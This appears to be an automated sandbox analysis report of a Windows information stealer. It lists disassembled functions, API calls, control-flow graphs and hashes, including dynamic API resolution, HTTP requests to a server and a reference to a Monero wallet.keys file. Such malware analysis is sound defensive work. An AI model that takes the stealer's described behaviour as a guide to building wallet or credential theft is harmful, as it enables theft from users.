                                    Function 00C979E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C811B7), ref: 00C97A10
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C97A17
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C97A2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: dfd708302f10f9d5cf549c4757222bf947136371884c9afc5deba2bddd7e337f
                                    • Instruction ID: 2224b5aece6726ef9d7e396180f8258405002999add9a2fde6b09e92e82aa93d
                                    • Opcode Fuzzy Hash: dfd708302f10f9d5cf549c4757222bf947136371884c9afc5deba2bddd7e337f
                                    • Instruction Fuzzy Hash: B2F04FB1948309EBCB00DF99DD49BAEBBB8EB05711F10021AF615A2680C77559008BA1
                                    Function 00C81160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 2a9904b9a595079b4cbefd41d43953ded28158f2921352b5eef65ca9d2d65486
                                    • Instruction ID: c853727136f6cf27dbd05d303fd6ece9ef3dc5c9878e000d78341c11d12d86cf
                                    • Opcode Fuzzy Hash: 2a9904b9a595079b4cbefd41d43953ded28158f2921352b5eef65ca9d2d65486
                                    • Instruction Fuzzy Hash: 67D09E7490431C9BCB04EFE0A9896DDBB78BB08616F140555DE0562340EA315496CBA5
                                    Function 00C99F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 c99f20-c99f2a 634 c99f30-c9a341 GetProcAddress * 43 633->634 635 c9a346-c9a3da LoadLibraryA * 8 633->635 634->635 636 c9a3dc-c9a451 GetProcAddress * 5 635->636 637 c9a456-c9a45d 635->637 636->637 638 c9a463-c9a521 GetProcAddress * 8 637->638 639 c9a526-c9a52d 637->639 638->639 640 c9a5a8-c9a5af 639->640 641 c9a52f-c9a5a3 GetProcAddress * 5 639->641 642 c9a5b5-c9a642 GetProcAddress * 6 640->642 643 c9a647-c9a64e 640->643 641->640 642->643 644 c9a72f-c9a736 643->644 645 c9a654-c9a72a GetProcAddress * 9 643->645 646 c9a738-c9a7ad GetProcAddress * 5 644->646 647 c9a7b2-c9a7b9 644->647 645->644 646->647 648 c9a7bb-c9a7e7 GetProcAddress * 2 647->648 649 c9a7ec-c9a7f3 647->649 648->649 650 c9a825-c9a82c 649->650 651 c9a7f5-c9a820 GetProcAddress * 2 649->651 652 c9a922-c9a929 650->652 653 c9a832-c9a91d GetProcAddress * 10 650->653 651->650 654 c9a92b-c9a988 GetProcAddress * 4 652->654 655 c9a98d-c9a994 652->655 653->652 654->655 656 c9a9ae-c9a9b5 655->656 657 c9a996-c9a9a9 GetProcAddress 655->657 658 c9aa18-c9aa19 656->658 659 c9a9b7-c9aa13 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,015163C0), ref: 00C99F3D
                                    • GetProcAddress.KERNEL32(75900000,01516460), ref: 00C99F55
                                    • GetProcAddress.KERNEL32(75900000,01528FA0), ref: 00C99F6E
                                    • GetProcAddress.KERNEL32(75900000,01528EF8), ref: 00C99F86
                                    • GetProcAddress.KERNEL32(75900000,0152C9A0), ref: 00C99F9E
                                    • GetProcAddress.KERNEL32(75900000,0152C8E0), ref: 00C99FB7
                                    • GetProcAddress.KERNEL32(75900000,0151B630), ref: 00C99FCF
                                    • GetProcAddress.KERNEL32(75900000,0152CA00), ref: 00C99FE7
                                    • GetProcAddress.KERNEL32(75900000,0152CA48), ref: 00C9A000
                                    • GetProcAddress.KERNEL32(75900000,0152C940), ref: 00C9A018
                                    • GetProcAddress.KERNEL32(75900000,0152C7F0), ref: 00C9A030
                                    • GetProcAddress.KERNEL32(75900000,01516380), ref: 00C9A049
                                    • GetProcAddress.KERNEL32(75900000,015165C0), ref: 00C9A061
                                    • GetProcAddress.KERNEL32(75900000,01516660), ref: 00C9A079
                                    • GetProcAddress.KERNEL32(75900000,015165E0), ref: 00C9A092
                                    • GetProcAddress.KERNEL32(75900000,0152C850), ref: 00C9A0AA
                                    • GetProcAddress.KERNEL32(75900000,0152CAD8), ref: 00C9A0C2
                                    • GetProcAddress.KERNEL32(75900000,0151B478), ref: 00C9A0DB
                                    • GetProcAddress.KERNEL32(75900000,01516600), ref: 00C9A0F3
                                    • GetProcAddress.KERNEL32(75900000,0152CAA8), ref: 00C9A10B
                                    • GetProcAddress.KERNEL32(75900000,0152C808), ref: 00C9A124
                                    • GetProcAddress.KERNEL32(75900000,0152CA18), ref: 00C9A13C
                                    • GetProcAddress.KERNEL32(75900000,0152C838), ref: 00C9A154
                                    • GetProcAddress.KERNEL32(75900000,015162C0), ref: 00C9A16D
                                    • GetProcAddress.KERNEL32(75900000,0152CA30), ref: 00C9A185
                                    • GetProcAddress.KERNEL32(75900000,0152C820), ref: 00C9A19D
                                    • GetProcAddress.KERNEL32(75900000,0152C9E8), ref: 00C9A1B6
                                    • GetProcAddress.KERNEL32(75900000,0152CA60), ref: 00C9A1CE
                                    • GetProcAddress.KERNEL32(75900000,0152C958), ref: 00C9A1E6
                                    • GetProcAddress.KERNEL32(75900000,0152C868), ref: 00C9A1FF
                                    • GetProcAddress.KERNEL32(75900000,0152C910), ref: 00C9A217
                                    • GetProcAddress.KERNEL32(75900000,0152C880), ref: 00C9A22F
                                    • GetProcAddress.KERNEL32(75900000,0152C928), ref: 00C9A248
                                    • GetProcAddress.KERNEL32(75900000,01529F78), ref: 00C9A260
                                    • GetProcAddress.KERNEL32(75900000,0152CA78), ref: 00C9A278
                                    • GetProcAddress.KERNEL32(75900000,0152CA90), ref: 00C9A291
                                    • GetProcAddress.KERNEL32(75900000,015162E0), ref: 00C9A2A9
                                    • GetProcAddress.KERNEL32(75900000,0152C898), ref: 00C9A2C1
                                    • GetProcAddress.KERNEL32(75900000,01516620), ref: 00C9A2DA
                                    • GetProcAddress.KERNEL32(75900000,0152C8F8), ref: 00C9A2F2
                                    • GetProcAddress.KERNEL32(75900000,0152CAC0), ref: 00C9A30A
                                    • GetProcAddress.KERNEL32(75900000,01516320), ref: 00C9A323
                                    • GetProcAddress.KERNEL32(75900000,01516340), ref: 00C9A33B
                                    • LoadLibraryA.KERNEL32(0152C8B0,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A34D
                                    • LoadLibraryA.KERNEL32(0152C8C8,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A35E
                                    • LoadLibraryA.KERNEL32(0152C9D0,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A370
                                    • LoadLibraryA.KERNEL32(0152C970,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A382
                                    • LoadLibraryA.KERNEL32(0152C988,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A393
                                    • LoadLibraryA.KERNEL32(0152C9B8,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A3A5
                                    • LoadLibraryA.KERNEL32(0152CCA0,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A3B7
                                    • LoadLibraryA.KERNEL32(0152CBB0,?,00C95EF3,00CA0AEB,?,?,?,?,?,?,?,?,?,?,00CA0AEA,00CA0AE7), ref: 00C9A3C8
                                    • GetProcAddress.KERNEL32(75FD0000,01516820), ref: 00C9A3EA
                                    • GetProcAddress.KERNEL32(75FD0000,0152CC40), ref: 00C9A402
                                    • GetProcAddress.KERNEL32(75FD0000,01528B70), ref: 00C9A41A
                                    • GetProcAddress.KERNEL32(75FD0000,0152CCE8), ref: 00C9A433
                                    • GetProcAddress.KERNEL32(75FD0000,015166A0), ref: 00C9A44B
                                    • GetProcAddress.KERNEL32(73530000,0151B298), ref: 00C9A470
                                    • GetProcAddress.KERNEL32(73530000,01516700), ref: 00C9A489
                                    • GetProcAddress.KERNEL32(73530000,0151B068), ref: 00C9A4A1
                                    • GetProcAddress.KERNEL32(73530000,0152CDD8), ref: 00C9A4B9
                                    • GetProcAddress.KERNEL32(73530000,0152CBE0), ref: 00C9A4D2
                                    • GetProcAddress.KERNEL32(73530000,01516840), ref: 00C9A4EA
                                    • GetProcAddress.KERNEL32(73530000,01516720), ref: 00C9A502
                                    • GetProcAddress.KERNEL32(73530000,0152CBC8), ref: 00C9A51B
                                    • GetProcAddress.KERNEL32(763B0000,015167E0), ref: 00C9A53C
                                    • GetProcAddress.KERNEL32(763B0000,01516860), ref: 00C9A554
                                    • GetProcAddress.KERNEL32(763B0000,0152CD90), ref: 00C9A56D
                                    • GetProcAddress.KERNEL32(763B0000,0152CB68), ref: 00C9A585
                                    • GetProcAddress.KERNEL32(763B0000,015169C0), ref: 00C9A59D
                                    • GetProcAddress.KERNEL32(750F0000,0151B1A8), ref: 00C9A5C3
                                    • GetProcAddress.KERNEL32(750F0000,0151AF28), ref: 00C9A5DB
                                    • GetProcAddress.KERNEL32(750F0000,0152CAF0), ref: 00C9A5F3
                                    • GetProcAddress.KERNEL32(750F0000,01516740), ref: 00C9A60C
                                    • GetProcAddress.KERNEL32(750F0000,015168C0), ref: 00C9A624
                                    • GetProcAddress.KERNEL32(750F0000,0151B090), ref: 00C9A63C
                                    • GetProcAddress.KERNEL32(75A50000,0152CB20), ref: 00C9A662
                                    • GetProcAddress.KERNEL32(75A50000,015168E0), ref: 00C9A67A
                                    • GetProcAddress.KERNEL32(75A50000,01528B10), ref: 00C9A692
                                    • GetProcAddress.KERNEL32(75A50000,0152CB38), ref: 00C9A6AB
                                    • GetProcAddress.KERNEL32(75A50000,0152CB50), ref: 00C9A6C3
                                    • GetProcAddress.KERNEL32(75A50000,01516680), ref: 00C9A6DB
                                    • GetProcAddress.KERNEL32(75A50000,01516900), ref: 00C9A6F4
                                    • GetProcAddress.KERNEL32(75A50000,0152CBF8), ref: 00C9A70C
                                    • GetProcAddress.KERNEL32(75A50000,0152CC58), ref: 00C9A724
                                    • GetProcAddress.KERNEL32(75070000,01516880), ref: 00C9A746
                                    • GetProcAddress.KERNEL32(75070000,0152CCB8), ref: 00C9A75E
                                    • GetProcAddress.KERNEL32(75070000,0152CC10), ref: 00C9A776
                                    • GetProcAddress.KERNEL32(75070000,0152CC28), ref: 00C9A78F
                                    • GetProcAddress.KERNEL32(75070000,0152CB80), ref: 00C9A7A7
                                    • GetProcAddress.KERNEL32(74E50000,015169A0), ref: 00C9A7C8
                                    • GetProcAddress.KERNEL32(74E50000,01516980), ref: 00C9A7E1
                                    • GetProcAddress.KERNEL32(75320000,01516920), ref: 00C9A802
                                    • GetProcAddress.KERNEL32(75320000,0152CCD0), ref: 00C9A81A
                                    • GetProcAddress.KERNEL32(6F060000,01516760), ref: 00C9A840
                                    • GetProcAddress.KERNEL32(6F060000,015169E0), ref: 00C9A858
                                    • GetProcAddress.KERNEL32(6F060000,015168A0), ref: 00C9A870
                                    • GetProcAddress.KERNEL32(6F060000,0152CB98), ref: 00C9A889
                                    • GetProcAddress.KERNEL32(6F060000,01516800), ref: 00C9A8A1
                                    • GetProcAddress.KERNEL32(6F060000,015166E0), ref: 00C9A8B9
                                    • GetProcAddress.KERNEL32(6F060000,01516940), ref: 00C9A8D2
                                    • GetProcAddress.KERNEL32(6F060000,015166C0), ref: 00C9A8EA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00C9A901
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00C9A917
                                    • GetProcAddress.KERNEL32(74E00000,0152CD00), ref: 00C9A939
                                    • GetProcAddress.KERNEL32(74E00000,015289F0), ref: 00C9A951
                                    • GetProcAddress.KERNEL32(74E00000,0152CC70), ref: 00C9A969
                                    • GetProcAddress.KERNEL32(74E00000,0152CD18), ref: 00C9A982
                                    • GetProcAddress.KERNEL32(74DF0000,01516960), ref: 00C9A9A3
                                    • GetProcAddress.KERNEL32(6E390000,0152CC88), ref: 00C9A9C4
                                    • GetProcAddress.KERNEL32(6E390000,01516A00), ref: 00C9A9DD
                                    • GetProcAddress.KERNEL32(6E390000,0152CD30), ref: 00C9A9F5
                                    • GetProcAddress.KERNEL32(6E390000,0152CD48), ref: 00C9AA0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 7ebd7df9dc11d9b653f651dee3ee16d24edecb7945fb473b2e2746b0b1cad3d8
                                    • Instruction ID: 02d91c3a7b11b3cfff8ae1542dec181b7805ec421b37759be41b1878938e0075
                                    • Opcode Fuzzy Hash: 7ebd7df9dc11d9b653f651dee3ee16d24edecb7945fb473b2e2746b0b1cad3d8
                                    • Instruction Fuzzy Hash: C7623FB5619B08AFC344EFA8FC889567BB9B78D303750861ABB19C3270D7359941EF60
                                    Function 00C848D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 c848d0-c84992 call c9aab0 call c84800 call c9aa50 * 5 InternetOpenA StrCmpCA 816 c8499b-c8499f 801->816 817 c84994 801->817 818 c84f1b-c84f43 InternetCloseHandle call c9ade0 call c8a210 816->818 819 c849a5-c84b1d call c98cf0 call c9ac30 call c9abb0 call c9ab10 * 2 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9ac30 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9ac30 call c9abb0 call c9ab10 * 2 InternetConnectA 816->819 817->816 829 c84f82-c84ff2 call c98b20 * 2 call c9aab0 call c9ab10 * 8 818->829 830 c84f45-c84f7d call c9ab30 call c9acc0 call c9abb0 call c9ab10 818->830 819->818 905 c84b23-c84b27 819->905 830->829 906 c84b29-c84b33 905->906 907 c84b35 905->907 908 c84b3f-c84b72 HttpOpenRequestA 906->908 907->908 909 c84b78-c84e78 call c9acc0 call c9abb0 call c9ab10 call c9ac30 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9ac30 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9ac30 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9acc0 call c9abb0 call c9ab10 call c9ac30 call c9abb0 call c9ab10 call c9aa50 call c9ac30 * 2 call c9abb0 call c9ab10 * 2 call c9ade0 lstrlen call c9ade0 * 2 lstrlen call c9ade0 HttpSendRequestA 908->909 910 c84f0e-c84f15 InternetCloseHandle 908->910 1021 c84e82-c84eac InternetReadFile 909->1021 910->818 1022 c84eae-c84eb5 1021->1022 1023 c84eb7-c84f09 InternetCloseHandle call c9ab10 1021->1023 1022->1023 1025 c84eb9-c84ef7 call c9acc0 call c9abb0 call c9ab10 1022->1025 1023->910 1025->1021
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C84800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C84889
                                      • Part of subcall function 00C84800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C84899
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C84965
                                    • StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C8498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C84B0A
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00CA0DDE,00000000,?,?,00000000,?,",00000000,?,0152E340), ref: 00C84E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C84E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C84E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C84E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00C84EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00C84F15
                                    • HttpOpenRequestA.WININET(00000000,0152E290,?,0152DA28,00000000,00000000,00400100,00000000), ref: 00C84B65
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00C84F1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: bcaeae9bd1da744afc76de3c09db1260b8fe688251553a20f8d5602db02fb7d9
                                    • Instruction ID: c70e296f056f2bb72c728fe66da06530d41feb59a6753164e97a9d8ab5ba5e08
                                    • Opcode Fuzzy Hash: bcaeae9bd1da744afc76de3c09db1260b8fe688251553a20f8d5602db02fb7d9
                                    • Instruction Fuzzy Hash: 50120A72910218ABCF14EB90DDAAFEEB379AF15300F504599F10666091EF706F48DFA6
                                    Function 00C95760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 c95760-c957c7 call c95d20 call c9ab30 * 3 call c9aa50 * 4 1106 c957cc-c957d3 1090->1106 1107 c957d5-c95806 call c9ab30 call c9aab0 call c81590 call c95440 1106->1107 1108 c95827-c9589c call c9aa50 * 2 call c81590 call c95510 call c9abb0 call c9ab10 call c9ade0 StrCmpCA 1106->1108 1124 c9580b-c95822 call c9abb0 call c9ab10 1107->1124 1134 c958e3-c958f9 call c9ade0 StrCmpCA 1108->1134 1138 c9589e-c958de call c9aab0 call c81590 call c95440 call c9abb0 call c9ab10 1108->1138 1124->1134 1139 c95a2c-c95a94 call c9abb0 call c9ab30 * 2 call c816b0 call c9ab10 * 4 call c81670 call c81550 1134->1139 1140 c958ff-c95906 1134->1140 1138->1134 1270 c95d13-c95d16 1139->1270 1143 c95a2a-c95aaf call c9ade0 StrCmpCA 1140->1143 1144 c9590c-c95913 1140->1144 1162 c95be1-c95c49 call c9abb0 call c9ab30 * 2 call c816b0 call c9ab10 * 4 call c81670 call c81550 1143->1162 1163 c95ab5-c95abc 1143->1163 1147 c9596e-c959e3 call c9aa50 * 2 call c81590 call c95510 call c9abb0 call c9ab10 call c9ade0 StrCmpCA 1144->1147 1148 c95915-c95969 call c9ab30 call c9aab0 call c81590 call c95440 call c9abb0 call c9ab10 1144->1148 1147->1143 1249 c959e5-c95a25 call c9aab0 call c81590 call c95440 call c9abb0 call c9ab10 1147->1249 1148->1143 1162->1270 1170 c95bdf-c95c64 call c9ade0 StrCmpCA 1163->1170 1171 c95ac2-c95ac9 1163->1171 1199 c95c78-c95ce1 call c9abb0 call c9ab30 * 2 call c816b0 call c9ab10 * 4 call c81670 call c81550 1170->1199 1200 c95c66-c95c71 Sleep 1170->1200 1178 c95acb-c95b1e call c9ab30 call c9aab0 call c81590 call c95440 call c9abb0 call c9ab10 1171->1178 1179 c95b23-c95b98 call c9aa50 * 2 call c81590 call c95510 call c9abb0 call c9ab10 call c9ade0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 c95b9a-c95bda call c9aab0 call c81590 call c95440 call c9abb0 call c9ab10 1179->1275 1199->1270 1200->1106 1249->1143 1275->1170
                                    APIs
                                      • Part of subcall function 00C9AB30: lstrlen.KERNEL32(00C84F55,?,?,00C84F55,00CA0DDF), ref: 00C9AB3B
                                      • Part of subcall function 00C9AB30: lstrcpy.KERNEL32(00CA0DDF,00000000), ref: 00C9AB95
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C95894
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C958F1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C95AA7
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C95440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C95478
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C95510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C95568
                                      • Part of subcall function 00C95510: lstrlen.KERNEL32(00000000), ref: 00C9557F
